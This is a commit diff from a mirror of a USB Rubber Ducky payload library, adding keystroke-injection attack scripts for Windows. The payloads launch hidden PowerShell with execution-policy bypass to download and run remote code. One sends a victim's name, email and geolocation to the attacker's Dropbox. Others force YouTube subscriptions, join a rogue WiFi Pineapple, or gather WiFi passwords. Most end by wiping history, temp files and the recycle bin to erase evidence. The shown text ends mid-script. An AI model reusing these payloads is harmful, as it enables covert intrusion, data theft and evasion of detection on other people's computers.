hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #83 from I-Am-Jakoby/master 

11 payloads
pull/85/head
Darren Kitchen 2022-05-10 17:30:44 -05:00 committed by GitHub
parent f236950f17 239554690d
commit 8febb83530
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
48 changed files with 4023 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

89
payloads/library/execution/-RD-Play-WAV/Play-WAV.ps1 Normal file
View File

@ -0,0 +1,89 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script requires you to have a DropBox account or another file hosting service
.DESCRIPTION
This program downloads a sound from your DropBox
Turns the volume to max level on victims PC
Pauses the script until a mouse movement is detected
Then plays the sound with nothing popping up catching your victim off guard
Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history
#>
############################################################################################################################################################
# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1")
iwr https:// <Your DropBox shared link intended for file> ?dl=1 -O $env:TMP\e.wav
############################################################################################################################################################
# This turns the volume up to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
############################################################################################################################################################
# This while loop will constantly check if the mouse has been moved
# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off
# it will then sleep for the indicated number of seconds and check again
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
############################################################################################################################################################
# Play Sound
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync()
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

99
payloads/library/execution/-RD-Play-WAV/README.md Normal file
View File

@ -0,0 +1,99 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Play-WAV
A script used to download a WAV file and play it after a mouse movement is detected
## Description
This program starts off by using an Invoke-WebRequest to download a WAV file
The system volume is then turned up to the max level
Then the script will be paused until a mouse movement is detected
After one is the WAV file will be played
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
```
powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Play-WAV)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

16
payloads/library/execution/-RD-Play-WAV/payload.txt Normal file
View File

@ -0,0 +1,16 @@
REM Title: Play-WAV
REM Author: I am Jakoby
REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
REM Target: Windows 10, 11
REM Remeber to replace the link with your link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
DELAY 500
ENTER

13
payloads/library/general/RD-PineApple/RD-PineApple.txt → payloads/library/general/-RD-PineApple/PineApple-KeyInjection.txt
View File

@ -1,17 +1,22 @@
REM Title: RD-PineApple
REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
REM Author: I am Jakoby
REM Target: Windows 10, 11
REM Title: PineApple
REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
REM This version is a direct key stroke injection attack
REM Author: I am Jakoby
REM Target: Windows 10, 11
DELAY 1000
REM If the wifi pineapple SSID is detected target PC will connect to it
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
STRING $profilefile="Home.xml";
SHIFT ENTER
STRING $SSID="PineApple";

25
payloads/library/general/RD-PineApple/RD-PineApple.ps1 → payloads/library/general/-RD-PineApple/PineApple.ps1
View File

@ -26,4 +26,27 @@ $xmlfile="<?xml version=""1.0""?>
$XMLFILE > ($profilefile)
netsh wlan add profile filename="$($profilefile)"
netsh wlan connect name=$SSID
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

95
payloads/library/general/-RD-PineApple/README.md Normal file
View File

@ -0,0 +1,95 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# PineApple
A script used to connect a targets PC to your wifi PineApple
## Description
This program will generate an XML file that will be used to create a network profile for your Wifi PineApple.
The XML file will be manually entered into a powershell window
the powershell window and run box will be erased for a clean exit.
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* The entire script will be manually entered into the powershell window
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-PineApple)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

17
payloads/library/general/-RD-PineApple/payload.txt Normal file
View File

@ -0,0 +1,17 @@
REM Title: OMG-PineApple
REM Author: I am Jakoby
REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
REM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile
REM The powershell script needed is provided as OMG-PineApple.ps1
REM Target: Windows 10, 11
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER

93
payloads/library/general/-RD-Subscribe/README.md Normal file
View File

@ -0,0 +1,93 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Subscribe
A script I put together to make your target subscribe to your youtube channel
## Description
This script is set to open your youtube account in their browser where they will be prompted to subscribe to you.
SPOILER: They do.
## Getting Started
### Dependencies
* Windows 10,11
* Your target will have to be signed into their youtube account
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* 15 seconds later you have a new subscriber
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Subscribe)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

38
payloads/library/general/-RD-Subscribe/Subscribe.ps1 Normal file
View File

@ -0,0 +1,38 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program is designed to get your target to subscribe to your youtube channel
#>
#############################################################################################################################################
# Enter your youtube channel URL here, but you should test this script with my URL first ;D
$channel = "https://www.youtube.com/iamjakoby"
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$url = -join($channel,"?sub_confirmation=1")
Start-Process $url
Start-Sleep -Seconds 3
[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
Start-Sleep -Seconds 1
[System.Windows.Forms.SendKeys]::SendWait('%{F4}')

32
payloads/library/general/-RD-Subscribe/Subscribe.txt Normal file
View File

@ -0,0 +1,32 @@
REM Title: OMG-Subscribe
REM Description: This payload is meant to get the owner of the target PC to subscribe to your youtube channel
REM Author: I am Jakoby
REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass Start-Process "
REM put your youtube link here, you should test it out with mine first though ;D
STRING https://www.youtube.com/iamjakoby
STRING ?sub_confirmation=1"
DELAY 500
ENTER
DELAY 3000
TAB
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 500
ALT F4
DELAY 1000
GUI r
DELAY 500
REM This will clear their powershell and runbox history
STRING powershell -w h -NoP -NonI -Exec Bypass reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
DELAY 500
ENTER

16
payloads/library/general/-RD-Subscribe/payload.txt Normal file
View File

@ -0,0 +1,16 @@
REM Title: Subscribe
REM Author: I am Jakoby
REM Description: This payload is meant to make your target subscribe to your youtube channel
REM Target: Windows 10, 11
REM Remember to replace the link with your link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER

13
payloads/library/general/RD-PineApple/RD-IWR-PineApple.txt
View File

@ -1,13 +0,0 @@
REM Title: RD-PineApple
REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
REM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile
REM The powershell script needed is provided as OMG-PineApple.ps1
REM Author: I am Jakoby
REM Target: Windows 10, 11
REM This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER

151
payloads/library/incident_response/-RD-ET-Phone-Home/ET-Phone-Home.ps1 Normal file
View File

@ -0,0 +1,151 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : GENERAL | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
.DESCRIPTION
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
This script will get the Name and email associated with the targets microsoft account
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
#>
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
#------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
#------------------------------------------------------------------------------------------------------------------------------------
echo $FN >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
# Upload output file to dropbox
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

120
payloads/library/incident_response/-RD-ET-Phone-Home/README.md Normal file
View File

@ -0,0 +1,120 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ET Phone Home
A script I put together to locate your stolen devices, or your "stolen" baited devices
## Description
This program is meant to locate your devices. When someone plugs it into their computer a one liner in the run box a script
will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 7,10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Your device is plugged into the targets computer
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
Something Like What you see below will be in your cloud storage:
NAME
EMAIL
LATITUDE AND LONGITUDE
```
Jakoby
jakoby@example.com
Latitude Longitude
-------- ---------
37.778919 -122.416313
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Kalani
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-ET-Phone-Home)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

21
payloads/library/incident_response/-RD-ET-Phone-Home/payload.txt Normal file
View File

@ -0,0 +1,21 @@
REM Title: ET-Phone-Home
REM Author: I am Jakoby
REM Target: Windows 10, 11
REM Description: this script will download and execute your locator script if your wifi access point is not detected
REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM Replace SSID with name of wifi your computer is connected to
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER

704
payloads/library/prank/-RD-AcidBurn/AcidBurn.ps1 Normal file
View File

@ -0,0 +1,704 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : AcidBurn | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby (youtube link with demonstration coming soon) # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script was not optimized to shorten the code. This script is intended to have as much readablility as possible for new coders to learn.
.DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
#>
############################################################################################################################################################
# Variables
$s=New-Object -ComObject SAPI.SpVoice
############################################################################################################################################################
# Intro ---------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fullName = Get-fullName
# echo statement used to track progress while debugging
echo "Intro Done"
###########################################################################################################
<#
.NOTES
RAM Info
This will get the amount of RAM the target computer has
#>
function Get-RAM {
try {
$OS = (Get-WmiObject Win32_OperatingSystem).Name;$OSpos = $OS.IndexOf("|");$OS = $OS.Substring(0, $OSpos)
$RAM=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1}" -f ($_.sum / 1GB)}
$RAMpos = $RAM.IndexOf('.')
$RAM = [int]$RAM.Substring(0,$RAMpos).Trim()
# ENTER YOUR CUSTOM RESPONSES HERE
#----------------------------------------------------------------------------------------------------
$lowRAM = "$RAM gigs of ram? might as well use pen and paper"
$okRAM = "$RAM gigs of ram really? I have a calculator with more computing power"
$goodRAM = "$RAM gigs of ram? Can almost guarantee you have a light up keyboard.. you are a wanna be streamer huh?"
$impressiveRAM = "$RAM gigs of ram? are you serious? a super computer with no security that is funny right there"
#----------------------------------------------------------------------------------------------------
if($RAM -le 4){
return $lowRAM
} elseif($RAM -ge 5 -and $RAM -le 12){
return $okRAM
} elseif($RAM -ge 13 -and $RAM -le 24){
return $goodRAM
} else {
return $impressiveRAM
}
}
# If one of the above parameters is not detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "Error in search"
return $null
-ErrorAction SilentlyContinue
}
}
# echo statement used to track progress while debugging
echo "RAM Info Done"
###########################################################################################################
<#
.NOTES
Public IP
This will get the public IP from the target computer
#>
function Get-PubIP {
try {
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
# If no Public IP is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No Public IP was detected"
return $null
-ErrorAction SilentlyContinue
}
